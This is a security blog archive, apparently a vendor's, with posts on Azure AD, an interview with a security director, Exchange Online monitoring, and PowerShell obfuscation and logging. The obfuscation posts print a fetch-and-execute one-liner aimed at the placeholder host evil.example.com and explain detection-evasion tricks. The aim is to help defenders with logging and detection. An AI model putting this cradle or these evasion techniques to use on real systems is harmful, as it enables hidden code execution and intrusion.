Category Archives: IT Pros

The Difference between Windows Server Active Directory and Azure AD

Once upon a time, IT pros believed that the risks of a data breach and compromised credentials were high enough to delay putting data in the cloud. After all, no organization wants to be a trending headline, announcing yet another data breach to the world. But with improved security, wider adoption and greater confidence over time, tech anxiety subsides, and running cloud-based applications such as Microsoft’s subscription-based Office 365 feels like a natural next step.

Once an organization starts using Office 365, how does it manage AD? With Windows Server AD or Azure AD? How are on-premises AD and Azure AD similar, and how are they different?

In this post, I will discuss the similarities, differences, and a few things in between.

What We Know For Sure: Windows Server Active Directory

Let’s start with what we know about Active Directory Domain Services.

First released with Windows 2000 Server, Active Directory is essentially a database that organizes your company’s users, computers and more. It provides authentication and authorization for applications, file services, printers, and other on-premises resources. It uses protocols such as Kerberos and NTLM for authentication, and LDAP to query and modify items in the AD database.
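To make that concrete, here’s a minimal sketch of an LDAP query from a domain-joined machine, using PowerShell’s built-in [adsisearcher] type accelerator (the account name jdoe is a placeholder):

# Find a user object via an LDAP filter against the current domain
([adsisearcher]'(&(objectCategory=person)(sAMAccountName=jdoe))').FindOne()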

There’s also that wonderful Group Policy feature to streamline user and computer settings throughout a network.

With so many security groups, user and admin accounts, and passwords stored in Active Directory, and with identity and access rights managed there as well, securing AD is key to safeguarding an organization’s assets.

Now, with emails, files, CRM systems and even applications stored in the cloud, can we be as confident that they’re as safe as when they lived on the company’s own servers?

A Whole New World: AD Service in the Cloud?

As new startups and organizations build their companies, they most likely won’t have any on-premises infrastructure, and the huge shocker is that they also won’t be creating forests and domains in AD. I’ll get more into this later.

But organizations that have already made a significant investment in on-premises infrastructure will have to envision a new way of operating their business.

Why? Azure AD will likely be a key part of Microsoft’s future. So if you’re already using any of Microsoft’s online services, such as Office 365, SharePoint Online or Exchange Online, you’ll have to figure out how to navigate your way around it. And organizations are already adopting cloud-based apps rapidly, running them nearly 50% of the time.

What’s different in Azure Active Directory?

First, you should know that Windows Server Active Directory wasn’t designed to manage web-based services.

Azure Active Directory, on the other hand, was designed to support web-based services that use REST (REpresentational State Transfer) APIs, such as Office 365 and Salesforce.com. Unlike plain Active Directory, it uses completely different protocols that work with these services (goodbye, Kerberos and NTLM): protocols such as SAML and OAuth 2.0.
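As a rough sketch of what that looks like in practice: once OAuth 2.0 hands you a bearer token, directory data is a plain REST call away. (Acquiring $token is out of scope here; the Microsoft Graph endpoint is one such REST interface.)

# Query users in the tenant over REST, authenticating with an OAuth 2.0 bearer token
$token = '<access token obtained via OAuth 2.0>'
Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/users' -Headers @{ Authorization = "Bearer $token" }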

As I pointed out earlier, with Azure AD you won’t be creating forests and domains. Instead, you’ll be a tenant, which represents an entire organization. In fact, once you sign up for Office 365, SharePoint Online or Exchange Online, you’ll automatically be an Azure AD tenant, where you can manage all the users in the company as well as their passwords, permissions, user data, etc.

Besides seamlessly connecting to any Microsoft Online Service, Azure AD can connect to hundreds of SaaS applications using single sign-on (SSO). This lets employees access the organization’s data without repeatedly being asked to log in. The access token is stored locally on the employee’s device, and you can limit access by setting token expiration dates.

For a list of free, basic and premium features, check out this comparison chart.

Introducing Azure AD Connect

Organizations ready to integrate their on-premises directory with Azure AD should try Azure AD Connect. For a great tutorial on integration, read this how-to article.

And in an upcoming post, I’ll curate a list of top Azure AD tutorials to help you transition into a brand new interface and terminology.

With the move to Azure, we bid you farewell Kerberos, forests and domains. And flights of Microsoft angels sing thee to thy rest! 

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been around for a while. It’s also an age-old question: some people will say it’s an ever-evolving threat, and some would say it’s just the same thing time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s the same as usual, and actually, the technical attack vectors tend to be rather the same. Buffer overflows have been with us for probably 40 years, and SQL injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeting, you know, nuclear facilities in Iran, I thought it was just, you know, a game changer. Things would never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.

 

IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model for making money out of malware, uses the same technical techniques as malware always did. But today’s dark web, plus the economic infrastructure of Bitcoin, enables it to be a real business, which is where it becomes riskier and more frightening to an extent.

 

IOS: At Varonis, we have obviously been focusing on the fact that attackers have had no problem, or fewer problems than in the past, getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment, where the attacker is better able to, you know, get in through the perimeter? Or have they not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security, and there are some smart guys out there. They know what it’s about; we are not blind as an industry to the new risks. That said, the hackers are successful, which implies that we are missing something! Based on results, we lose.

Why this misalignment of capabilities and results exists is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, IT security tends to be a nine-to-five sort of job, when it needs to be a lot more like policing, like physical security. We need to be into it. I coined a term for that: we need to do continuous security, as you’d expect the army or military or police to do.

 

IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building, if you think about it in physical terms. And if we do that, if people invest more time and more thinking, they’ll also feed back into the technical means, which are our primary security tools today.

 

IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory, maybe, but it’s important, and that’s the fact that there is no total security. The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. And if it’s about risk management, it implies that we have to make choices, and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it’s the less important systems, and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So that means things like separating systems that are important: defining which are the business-critical systems, those your stock would drop over if they were hacked, and which are peripheral, important but less so.

 

IOS: So we’ve often talked about Privacy by Design on the IOS blog, but the term, as you told me, is actually older. That phrase really comes out of Security by Design, which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, where systems are protected after they are put in place, to designing their security upfront, before we start deploying them. So it’s … the other part. I spent many years in application security, which is all about that.

And I think that the concept of baking security into the development process makes sense to everyone. It saves money later on, because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. As I mentioned, Security by Design is a term that’s been used for a decade and a half. It doesn’t happen enough, and the question is why. Why is Security by Design not happening as much as we would like it to, and how do we make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important, but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem, so it’s not the developer’s problem or the development manager’s problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it will remain a leftover, an afterthought.

 

IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for correcting market deficiencies. When things do not work because the right incentives aren’t there, compliance is an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it would be an interesting idea to try to create regulations for the development process. It’s harder, because we make end-result regulations … we don’t make good software requirements!

That said, I once saw an interesting demonstration: somebody created a label for software, like the label you have on food, with ingredients saying, you know, how many SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …

 

IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and we’ve also spoken to a few actual testers. Obviously, this is another way to deal with improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes later in the game, once the system is ready. So if I say I believe in Security by Design, then pen testing seems less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase, where you bring people in and they tell you what you didn’t do right.

Why don’t I see this as more than educational? First, because pen testers are usually given only as much time as was budgeted. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one; usually it gets some things, but it doesn’t get all the things … It’s good for education, since it will show there is an issue, but it’s not good enough to make sure that we are really secure.

IOS: That’s right.

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting flaw in a specific place, don’t just fix that one, fix all of the cross-site scripting … or think about why your system was not built to overcome cross-site scripting in the first place. Take it [as a] driver for Security by Design.

As an anecdote, I once met an organization where a pen tester came in and found cross-site scripting. He demonstrated it by having the app pop up a “gotcha” dialog. And two weeks later, the developers came back and said they fixed it: it doesn’t happen anymore. What they had done was just check for the word “gotcha” in their input and block it. That does happen, unfortunately!

Beyond fixing the single instance, if you have pen testing and they found cross-site scripting, fine: think about why your system, in the first place, was not built to handle it across the board.

The second thing that’s very important: pen testing is usually done very late in the development lifecycle, and too many times there’s just not enough time to fix things. So doing it earlier, making it part of the, you know, testing as modules are released rather than at the last moment, will ensure that more can be fixed before launch … those systems will be less vulnerable.

 

IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also Windows 10 S, which is Microsoft’s special security configuration of Windows 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Windows 10 S is the whitelisting version. If you think about security, there are two options to secure things, and nearly every security system selects one. The first is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example: install whatever you want to install, and the anti-virus will catch it if it’s a virus.

The second option, whitelisting, is always more secure, but it always limits functionality more. Windows 10 S takes this approach. It limits software installation to only things that actually come from the Microsoft App Store.

So it’s way more limited, functionally speaking, and it sort of feels like less of a full system. And personally, you know, [as] an IT guy who’s been here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded, because the malware wouldn’t have been signed, so it wouldn’t have been on the actual whitelist of …

OS: It’s not just signing: the software actually has to be downloaded from the Microsoft App Store, so it’s way more than that … Signing exists in Windows today; this is the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know, there is no performance penalty. In a way, having more security in this case might actually improve performance and stability, because unpredicted software is also a challenge for performance and stability. The downside is functionality.

 

IOS: Right. We know from security analysts that hackers and cybercriminals have targeted executives — they call it, you know, spear phishing or whale phishing — and, you know, executives have more valuable information compared to the average employee.

So it would sort of make sense to target these people. I was wondering if you think that executives should receive extra security protections, or whether they should take extra precautions in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, it does make sense. … But a lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as a user, why stop at executives?

So my take on that would be: make the automated detection systems address any user, but then focus. An alert still gets to the incident response team, which has to assess whether the risk is there and what to do. They can prioritize based on the type of user – executives being one type of sensitive user, by the way. Admins, of course, are another type.

IOS: Yeah, I mean, I could almost imagine, I guess, a SOC having a special section just focused on executives, perhaps looking at any kind of notifications or alerts that come up from the, you know, the standard configuration, but actually digging a little deeper when those things come up for the executives.

OS: Yes. If you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that enables them to be more efficient in handling alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop the alerts about the executives to the top of the list, and the analyst gets to them first and does something reasonable … he’s more valuable to the organization.

Because, in fact, there is no 100% security! Some incidents or alerts will be left unhandled.

 

IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question, and it’s always hard. I’m probably wrong, but I’ll try.

So the way to look into that, the way to try to predict, is something I’ve found: hacking techniques usually trail changes in IT technology. Hackers become experts in a new technology only a year or two, or even more than that, after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but business use of mobile, such as the Salesforce mobile app, is rather new. In the last couple of years, we can actually do more work on the mobile device, which means it’s a good target for malware. We’ve seen malware for mobile, but we still haven’t seen financial or enterprise malware, such as ransomware, for mobile, for example. And that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And to date, we’ve seen mostly denial-of-service attacks against, you know, Internet of Things devices, where they were … taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And I still don’t see — unlike, for example, malware for mobile or malware on cloud systems — the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

PowerShell Obfuscation: Stealth Through Confusion, Part II

This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was a little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.
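If you’d rather script it than click through the GPM console, module logging lives under a well-known policy registry path. A minimal sketch (these are the standard policy keys; verify them in your environment before relying on this):

# Enable PowerShell module logging for all modules via the policy registry keys
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
New-Item -Path "$base\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $base -Name EnableModuleLogging -Value 1
New-ItemProperty -Path "$base\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null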

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled at run-time to form a cmdlet.
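For instance, in miniature (a stand-in for the screenshot, not Invoke-Obfuscation’s exact output), the call operator & happily invokes whatever command the concatenated string names:

# "Invoke-Expression" never appears whole in the script text
& ('In'+'voke-Ex'+'pression') 'Write-Host "assembled at run-time"'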

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part, $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4th, 15th, and 25th characters (zero-indexed) to generate “IEX”, the PowerShell alias for Invoke-Expression. The -join operator then converts the character array to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell you can specify the position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke-Expression cmdlet.
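Both tricks boil down to a couple of lines you can try yourself (a simplified sketch, assuming the usual value of $env:ComSpec):

$env:ComSpec[4,15,25] -join ''              # "C:\WINDOWS\system32\cmd.exe" -> "Iex"
"{2}{0}{1}" -f 'ke-Expr','ession','Invo'    # format operator reassembles "Invoke-Expression"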

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could see through the fog and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell module logging enabled, the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Windows Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy – in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes moved to a more complicated logistic regression model – basically classifying PowerShell code as either evil obfuscated or normal scripts. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats on levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

Lee Holmes’ machine learning model suggests that it’s possible to detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

3 Tips to Monitor and Secure Exchange Online

Even if you don’t have your sights on the highest office in the country, keeping a tight leash on your emails is now more important than ever.

Email is commonly targeted by hackers as a method of entry into organizations. Whether your email is hosted by a third party or managed internally, it is imperative to monitor and secure those systems.

Microsoft Exchange Online – part of Microsoft’s Office 365 cloud offering – is just like Exchange on-prem, except you don’t have to deal with the servers. Microsoft provides some tools and reports to assist in securing and monitoring Exchange Online, like encryption and archiving, but it doesn’t cover all the things that keep you up at night, like:

  • What happens when a hacker gains access as an owner to an account?
  • What happens if a hacker elevates permissions and makes themselves owner of the CEO’s email?
  • What happens when hackers have access to make changes to the O365 environment: will you notice?

These questions are exactly what prompted us to develop our layered security approach – which Andy does a great job explaining the major principles of here. What happens when the bad people get in – and they have the ability to change and move around the system? At the end of the day, Exchange Online is another system that provides an attack vector for hackers.

Applying these same principles to Exchange Online, we can extrapolate the following to implement monitoring and security for your email in the cloud:

  1. Lock down access: Make sure only the correct people are owners of mailboxes, and limit the ability to change permissions or O365 settings to a small group of administrators (see the sketch after this list).
  2. Manage user access: Archive and delete inactive users immediately. Inactive users are an easy target for hackers, as they are usually able to use those accounts without being noticed.
  3. Monitor behavior: Implement a user behavior analytics (UBA) system on top of your email monitoring. Spotting abnormal behavior early (e.g., an account being promoted to owner of the CEO’s email folder, or another account forwarding thousands of emails to the same address) is the key to stopping a hacker in hours or days instead of weeks or months.
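As a concrete starting point for the first tip, here’s a hedged sketch using the ExchangeOnlineManagement module (the cmdlets are standard; adapt the filter to your tenant):

# Connect, then list non-owner FullAccess grants -- each one is a candidate for review
Connect-ExchangeOnline
Get-Mailbox -ResultSize Unlimited |
    Get-MailboxPermission |
    Where-Object { $_.AccessRights -contains 'FullAccess' -and $_.User -notlike 'NT AUTHORITY\SELF' } |
    Select-Object Identity, User, AccessRights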

Wondering if there’s a good solution to help monitor your Exchange Online? Well, we’ve got you covered there too.

PowerShell Obfuscation: Stealth Through Confusion, Part I

This article is part of the series "PowerShell Obfuscation". Check out the rest:

To get into the spirit of this post, you should probably skim through the first few slides of this presentation by Daniel Bohannon and Lee Holmes, given at Black Hat 2017. Who would have thunk that making PowerShell commands look unreadable would require a triple-digit slide deck?

We know PowerShell is the go-to tool for post-exploitation, allowing attackers to live off the land and prosper. Check out our pen testing Active Directory series for more proof.

However, IT security is, in theory, monitoring user activities at, say, the Security Operations Center or SOC, so it should be easy to spot when a “non-normal” command is being executed.

In fact, we know that one tipoff of a PowerShell attack is when a user creates a WebClient object, calls its DownloadString method, and then executes the string contained in the remote web page. Something like the following:
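(The screenshot that originally ran here is omitted; below is a representative one-liner with a placeholder URL, not the exact command from the original image.)

# Download a remote script as a string and execute it in memory; no file touches disk
IEX (New-Object System.Net.WebClient).DownloadString('http://evil.example.com/payload.ps1')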

Why would an ordinary user, or even for that matter an admin, do this?

While this “clear text” is easy to detect by looking at the right logs in Windows and scanning for the appropriate keywords, the obfuscated version is anything but. At the end of this post, we’ll show how this basic “launch cradle” used by hackers can be made to look like a complete, undecipherable word jumble.

PowerShell Logging

Before we take our initial dive into obfuscation, let’s explore how events actually get logged by Windows, specifically for PowerShell. Once you see the logs, you’ll get a greater appreciation of what hackers are trying to hide.

To their credit, Microsoft has realized the threat possibilities in PowerShell and started improving command logging in Windows 7. You see these improvements in PowerShell versions 4 and 5.

In my own AWS environment, the Windows Server 2012 I used came equipped with version 4. It seems to have most of the advanced logging capabilities — though 5 has the latest and greatest.

From what I was able to grok reading Bohannon’s great presentation and a few other Microsoft sources, you need to enable event 4688 (process creation) and then turn on auditing for the PowerShell command line. You can read more about it in this Microsoft document.
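For reference, the command-line piece can also be switched on outside of Group Policy via the documented policy registry value (double-check the path against current Microsoft guidance):

# Include command lines in event 4688 (Audit Process Creation must also be enabled)
$audit = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
New-Item -Path $audit -Force | Out-Null
Set-ItemProperty -Path $audit -Name ProcessCreationIncludeCmdLine_Enabled -Value 1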

And then for even more voluminous logging, you can set policies in the GPO console to enable, for example, full transcription logging of PowerShell sessions (below).

More PowerShell logging features in the Administrative Templates under Computer Configuration.

No, I didn’t do that for my own testing! I discovered (as many other security pros have) that when using the Windows Event Viewer, things get confusing very quickly. I don’t need the full power of transcription logging.

For kicks, I ran a simple pipeline — Get-Process | %{Write-Host $_.Handles} — to print out process handles, and generated … an astonishing 114 events in the PowerShell log. Ofer, by the way, has a good post explaining the larger problem of correlating separate events to understand the full picture.

Got it! The original pipeline that spewed off lots of related events.

The good news is that from the Event Viewer, I was able to see the base command line that triggered the event cascade (above).

Release the Confusion

The goal of the attacker is to make it very difficult or impossible for security staff viewing the log to detect obvious hacking activity or, more likely, to fool analytics software into not triggering when malware is loaded.

In the aforementioned presentation, there’s a long, involved example, showing how to obfuscate malware by exploiting PowerShell’s ability to execute commands embedded in a string.

Did you know this was possible?

Or, at a more evil level, this:

Or take a look at this, which I cooked up based on my own recipe:

Yeah, PowerShell is incredibly flexible and the hackers are good at taking advantage of its features to create confusion.

You can also ponder this one, which uses environment variables in an old-fashioned Windows shell to hide the evil code and then pipe it into PowerShell:

You should keep in mind that in a PowerShell pipeline, each pipe segment runs as a separate process, which spews its own events for maximum log confusion. The goal in the above example is to use the %cmd% variable to hide the evil code.
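A stripped-down sketch of the idea, using the same harmless stand-in payload from earlier in this post:

:: cmd.exe one-liner: stash the script in %cmd%, then feed it to PowerShell via stdin
set "cmd=write-host evil malware" && echo %cmd% | powershell -NoProfile -Command -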

However, from my Windows Event Viewer, I was able to spot the full original command line — though it took some digging.

In theory, you could look for the actual malware signature, which in my example is represented by “write-host evil malware”, within the Windows logs by scanning the command lines.

But hackers have become very clever at making the malware signature itself invisible. That’s really the example I first started with.

The idea is to use the WebClient .Net object to read the malware that’s contained on a remote site and then execute it with PowerShell’s Invoke-Expression. In the Event Viewer, you can’t see the actual code!

This is known as fileless malware, and it has become a very popular technique among the hackeratti. As I mentioned in the beginning, security pros can counteract this by looking instead for WebClient and DownloadString in the command line. It’s just not a normal user command, at least in my book.

A Quick Peek at Invoke-Obfuscation

This is where Bohannon’s Invoke-Obfuscation tool comes into play. He spent a year exploring all kinds of PowerShell command-line obfuscation techniques — and he’s got the beard to prove it! — to make it almost impossible to scan for obvious keywords.

His obfuscations are based on escape sequences and clever PowerShell programming to manipulate commands.

I loaded his Invoke-Obfuscation app onto my AWS server and tried it out for myself. We’ll explore more of this tool next time, but here’s what happened when I gave it the above WebClient.DownloadString fileless command string:

Invoke-Obfuscation’s string obfuscation. Hard to search for malware signatures within this jumble.

Very confusing! And I was able to test the obfuscated PowerShell within his app.

Next time we’ll look at more of Invoke-Obfuscation’s powers and touch on new ways to spot these confusing, but highly dangerous, PowerShell scripts.


[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.


A self-described all-around security guy, Ofer Shezaf is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel’s Technion University.

It’s always great to talk to Ofer about data security, since his perspective is shaped by a 20-year career. He’s seen it all! In the first part of our interview, we learn how hackers have taken long-standing techniques such as SQL injection and built successful business models around their malware.

Can they be stopped? Ofer thinks we’ll first need to have new metrics and measurements describing the security of developed software. Click on the interview above to hear more about what he has to say.


Practical PowerShell for IT Security, Part V: Security Scripting Platform Gets a Makeover

A few months ago, I began a mission to prove that PowerShell can be used as a security monitoring tool. I left off with this post, which had PowerShell code to collect file system events, perform some basic analysis, and then present the results in graphical format. My Security Scripting Platform (SSP) may not be a minimum viable product, but it was, I think, useful as a simple monitoring tool for a single file directory.

After finishing the project, I knew there were areas for improvement. The event handling was clunky, the passing of information between various parts of the SSP platform was anything but straightforward, and the information being displayed using the very primitive Out-GridView was really just a glorified table.

New and Improved

I took up the challenge of making SSP a bit more viable. My first task was to streamline event handling. I had initially worked it out so that file event messages were picked up by a handler in my Register-EngineEvent scriptblock and sent to an internal queue and then finally forwarded to the main piece of code, the classification software.

I regained my sanity and realized I could just directly forward the messages with Register-EngineEvent -Forward from within the event-handling scriptblock, removing an unnecessary layer of queuing craziness.

You can see the meaner, leaner version below.

#Count events, detect bursts, forward to main interface

$cur = Get-Date
$Global:Count=0
$Global:baseline = @{"Monday" = @(1,1,1); "Tuesday" = @(1,.5,1);"Wednesday" = @(4,4,4);"Thursday" = @(7,12,4); "Friday" = @(5,4,6); "Saturday"=@(2,1,1); "Sunday"= @(2,4,2)}
$Global:cnts =     @(0,0,0)
$Global:burst =    $false
$Global:evarray =  New-Object System.Collections.ArrayList

$action = { 
    $Global:Count++  
    $d=(Get-Date).DayofWeek
    $i= [math]::floor((Get-Date).Hour/8) 

   $Global:cnts[$i]++ 
   

   #event auditing!
    
   $rawtime =  $EventArgs.NewEvent.TargetInstance.LastAccessed.Substring(8,6)
   $filename = $EventArgs.NewEvent.TargetInstance.Name
   $etime= [datetime]::ParseExact($rawtime,"HHmmss",$null)
  

   $msg="$($etime): Access of file $($filename)"
   $msg|Out-File C:\Users\Administrator\Documents\events.log -Append
  
   New-Event -SourceIdentifier Delta -MessageData "Access" -EventArguments $filename  #notify 
   
   $Global:evarray.Add(@($filename,$etime))
   if(!$Global:burst) {
      $Global:start=$etime
      $Global:burst=$true            
   }
   else { 
     if($Global:start.AddMinutes(15) -gt $etime ) { 
        $Global:Count++
        #File behavior analytics
        $sfactor=2*[math]::sqrt( $Global:baseline["$($d)"][$i])
       
        if ($Global:Count -gt $Global:baseline["$($d)"][$i] + 2*$sfactor) {  #at 95% level of poisson
         
         
          "$($etime): Burst of $($Global:Count) accesses"| Out-File C:\Users\Administrator\Documents\events.log -Append 
          $Global:Count=0
          $Global:burst =$false
          New-Event -SourceIdentifier Delta -MessageData "Burst" -EventArguments $Global:evarray #notify on burst
          
          $Global:evarray= [System.Collections.ArrayList] @()
        }
     }
     else { $Global:burst =$false; $Global:Count=0; $Global:evarray= [System.Collections.ArrayList]  @()}
   }     
} 

Register-EngineEvent -SourceIdentifier Delta -Forward 
